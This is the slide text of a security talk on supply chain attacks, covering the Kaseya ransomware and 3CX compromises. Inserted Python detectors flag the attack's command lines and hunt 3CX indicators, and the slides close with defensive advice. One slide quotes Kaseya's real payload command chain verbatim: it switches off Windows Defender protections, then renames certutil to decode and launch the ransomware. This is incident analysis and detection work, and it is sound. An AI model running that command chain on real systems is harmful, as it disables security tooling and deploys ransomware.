Supply Chain
Attacks
#WHOAMI
• Lionel Faleiro
• Key Domains – Malware Analysis, Log Analysis, IR and
Security Analytics, Training, Threat Intelligence
• Gamer, Photographer
• @sandmaxprime
2
Agenda
3
What are Supply Chain Attacks
Attack Vectors
In The News
Anatomy of an Attack
Defending against SCA
What are Supply Chain Attacks
4
• Value chain attack / 3rd party attack
• Compromise of enterprise networks -> via applications, 3rd party entities
• Executed by APT groups
• Who is the target?
Attack vectors
5
• Third party software providers
• Data storage solutions
• Development or testing platforms
• Website services
• Repositories
In the News
6
Anatomy of an Attack – Kaseya Ransomware
7
• Happened on July 2, 2021
• Kaseya VSA servers were exploited to deploy ransomware downstream to users
• Kaseya VSA Agent Hot-Fix <- malicious task
• Ransomware encryptor pushed as agent.crt → decoded to agent.exe
• Used DLL sideloading against Windows Defender -> REvil -> Registry Key
• Timed to encrypt at 1630 UTC
• Around 60 customers and 1500+ businesses affected
Anatomy of an Attack – Kaseya Ransomware
8
"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul &
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend &
copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe &
echo %RANDOM% >> C:\Windows\cert.exe &
C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe &
del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe
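Added example, not part of the slides: a small Python detector that flags the tell-tale pieces of the command above in process-creation command lines (Defender features switched off via Set-MpPreference, cloud reporting disabled, certutil copied under a new name and altered with an appended random value, and that renamed copy used to -decode the payload). The command lines are constructed samples, and the log source is assumed to expose the full command line as a string.

```python
import re

# Constructed sample command lines (not from the slides). The first two mirror
# the Kaseya push shown above; the last two are benign controls.
SAMPLE_CMDLINES = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference "
    r"-DisableRealtimeMonitoring $true -DisableScriptScanning $true -Force "
    r"-MAPSReporting Disabled -SubmitSamplesConsent NeverSend",
    r"copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & "
    r"echo %RANDOM% >> C:\Windows\cert.exe & "
    r"C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe",
    r"powershell.exe Get-MpPreference",
    r"certutil.exe -verify C:\temp\server.cer",
]

# Each rule is (name, regex), derived from the artefacts on the slide: Defender
# features switched off, cloud reporting disabled, certutil copied under another
# name, that copy altered, and a binary not named certutil.exe doing a -decode.
RULES = [
    ("defender_tamper",
     re.compile(r"Set-MpPreference\b.*?-Disable\w+\s+\$true", re.I)),
    ("defender_cloud_off",
     re.compile(r"-(?:MAPSReporting\s+Disabled|SubmitSamplesConsent\s+NeverSend)", re.I)),
    ("certutil_copied",
     re.compile(r"\bcopy\b[^&]*?certutil\.exe\s+(?![^&]*certutil\.exe)\S+", re.I)),
    ("binary_appended",
     re.compile(r"echo\s+%RANDOM%\s*>>\s*\S+\.exe", re.I)),
    ("renamed_certutil_decode",
     re.compile(r"\b(?!certutil\.exe)[\w-]+\.exe\s+-decode\s+\S+\s+\S+", re.I)),
]


def scan_cmdline(cmdline):
    """Return the names of all rules a single command line triggers, in rule order."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan_log(cmdlines, min_hits=1):
    """Return (index, hits) for each command line that triggers at least min_hits rules."""
    findings = []
    for i, line in enumerate(cmdlines):
        hits = scan_cmdline(line)
        if len(hits) >= min_hits:
            findings.append((i, hits))
    return findings


if __name__ == "__main__":
    for idx, hits in scan_log(SAMPLE_CMDLINES):
        print(f"cmdline {idx}: {', '.join(hits)}")
```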
Anatomy of an Attack – 3CX
9
• 3CX Desktop App
• Software was compromised with Trojanized versions
• Bundled malicious DLL -> ffmpeg.dll
• EDR alerts - March 29th
• Content
• SUDDENICON -> downloaded encrypted icon files - https://github[.]com/IconStorages/images
• Icon files carried the C2 -> ICONIC Stealer
• Mandiant -> UNC4736
• Double supply chain attack => X_TRADER -> VEILEDSIGNAL
Anatomy of an Attack – 3CX
10
Anatomy of an Attack – 3CX
11
• 3CX systems were infected with TAXHAUL malware on Windows and SIMPLESEA on macOS
• Used Fast Reverse Proxy to move laterally
Anatomy of an Attack – 3CX
12
Anatomy of an Attack – 3CX
13
• Initial Response
• Determine scope of exploited installs
• Hunt for the IOCs – connections to the domains and hashes
• Hunt for child processes of the Desktop App
• Hunt for suspicious loading of the DLL files
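Added example, not part of the slides: two of the hunts listed above (child processes of the Desktop App, and loads of the bundled DLL) run over constructed process-creation and image-load events. The image name 3CXDesktopApp.exe, the assumption that the app's own self-spawned helper processes are benign, and the event layout are assumptions; the IOC hash set is a placeholder to be filled from the vendor or Mandiant IOC list, which the slides do not reproduce.

```python
import os

APP_IMAGE = "3cxdesktopapp.exe"   # assumed image name of the 3CX Desktop App
WATCHED_DLLS = {"ffmpeg.dll"}     # the bundled malicious DLL named on the slide
# Placeholder only: the slides give no hashes; fill from the published IOC list.
KNOWN_BAD_SHA256 = {"PLACEHOLDER_SHA256_FROM_IOC_LIST"}

# Constructed sample events in a minimal Sysmon-like shape (not real telemetry).
APP_DIR = r"C:\Program Files\3CXDesktopApp"
SAMPLE_EVENTS = [
    {"type": "process", "pid": 4100, "ppid": 900, "image": APP_DIR + r"\3CXDesktopApp.exe"},
    {"type": "process", "pid": 4188, "ppid": 4100, "image": APP_DIR + r"\3CXDesktopApp.exe"},
    {"type": "process", "pid": 4300, "ppid": 4100, "image": r"C:\Windows\System32\cmd.exe"},
    {"type": "image_load", "pid": 4100, "image_loaded": APP_DIR + r"\ffmpeg.dll",
     "sha256": "PLACEHOLDER_SHA256_FROM_IOC_LIST"},
    {"type": "image_load", "pid": 4100, "image_loaded": APP_DIR + r"\ffmpeg.dll",
     "sha256": "constructed-clean-hash"},
    {"type": "image_load", "pid": 5000, "image_loaded": r"C:\Users\Public\ffmpeg.dll",
     "sha256": "constructed-unknown-hash"},
]


def _base(path):
    """Lower-cased file name of a Windows path, computed the same way on any host OS."""
    return os.path.basename(path.replace("\\", "/")).lower()


def hunt_child_processes(events):
    """Children of the Desktop App other than its own helper processes (assumed benign)."""
    app_pids = {e["pid"] for e in events
                if e["type"] == "process" and _base(e["image"]) == APP_IMAGE}
    return [(e["pid"], e["image"]) for e in events
            if e["type"] == "process" and e["ppid"] in app_pids
            and _base(e["image"]) != APP_IMAGE]


def hunt_dll_loads(events):
    """Every load of a watched DLL: loader image, DLL path, and whether the hash is an IOC."""
    image_by_pid = {e["pid"]: e["image"] for e in events if e["type"] == "process"}
    return [{"pid": e["pid"],
             "loader": _base(image_by_pid.get(e["pid"], "unknown")),
             "dll": e["image_loaded"],
             "ioc_match": e["sha256"] in KNOWN_BAD_SHA256}
            for e in events
            if e["type"] == "image_load" and _base(e["image_loaded"]) in WATCHED_DLLS]


if __name__ == "__main__":
    print("suspicious children:", hunt_child_processes(SAMPLE_EVENTS))
    for finding in hunt_dll_loads(SAMPLE_EVENTS):
        print("dll load:", finding)
```

Loads that do not match an IOC hash are still returned so they can be triaged; a DLL load by an unexpected loader, like the last sample event, is what the slide's "suspicious loading" hunt is meant to surface.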
Anatomy of an Attack – 3CX
14
Defending Against SCA
15
• Have security guidelines for suppliers
• Vulnerability management system
• Good software inventory
• Enforce change control
• Restricted access rights / controls
• Identify alternatives / failover processes
• Well defined SDLC and secure coding practices
• Protect code and repositories
References
16
• https://www.enisa.europa.eu/publications/threat-landscape-for-supply-chain-attacks
• https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/
• https://www.mandiant.com/resources/blog/3cx-software-supply-chain-compromise
• https://www.volexity.com/blog/2023/03/30/3cx-supply-chain-compromise-leads-to-iconic-incident/
• https://twitter.com/fr0gger_
• https://news.sophos.com/en-us/2021/07/02/kaseya-vsa-supply-chain-ransomware-attack/
• https://news.sophos.com/en-us/2023/03/29/3cx-dll-sideloading-attack/